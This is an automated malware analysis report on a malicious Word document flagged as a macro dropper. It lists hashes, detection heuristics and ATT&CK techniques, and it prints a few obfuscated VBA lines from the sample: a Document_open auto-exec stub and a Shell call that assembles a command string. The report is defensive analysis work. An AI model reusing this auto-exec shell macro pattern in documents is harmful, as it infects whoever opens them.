Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e24e78ea350aa0b7…

MALICIOUS

Office (OLE)

Size: 114.8 KB
Created: 2018-06-13 21:19:00
Authoring application: Microsoft Office Word
First seen: 2018-06-21
MD5: b1a98a7f3844ebca49109c08773d0945
SHA-1: fb651c0b6c3af2d87d5a8dde07c1dcb9c40f4d6e
SHA-256: e24e78ea350aa0b7e69bd40ac33c3bc4eb3dc8cdc17a5dc13ef98a14cbecb2ab
Risk score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro triggers a 'Shell()' call, which is highly indicative of downloading and executing a second-stage payload. ClamAV also identified this as 'Doc.Dropper.Agent-6593963-0', further supporting its role as a dropper.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6593963-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6593963-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
    Matched lines in script:
      TdzzT = CDbl(rwMNk * CDbl(aizvjG + Int(KHGoA * Rnd(27787)) * UrRYSq * Log(91718 * ObjRhr - EEdIF + Fix(51))))
      NwcMUTm = kPfNCm + VBA.Shell(zRwididwGX + Chr(RqJpT + vbKeyP + opmiBSonEN) + "owers" + kXsKkQR + djjuiLSoU + lQiuYJF + HmdLzj, 34216 - 34216)
      IcWBOf = Tan(86780)
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
    Matched lines in script:
      End Function
      Private Sub Document_open()
      On Error Resume Next
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents, or documents where source extraction failed, so that visible macro source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body; this is a standard Office Open XML namespace identifier, not a download location)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11327 bytes
SHA-256: 417260c9382c876bc47a1228a2b9b65bda5dd011f07f80d9c02aa5ceae99170e
Script preview (first 1,000 lines of the extracted script)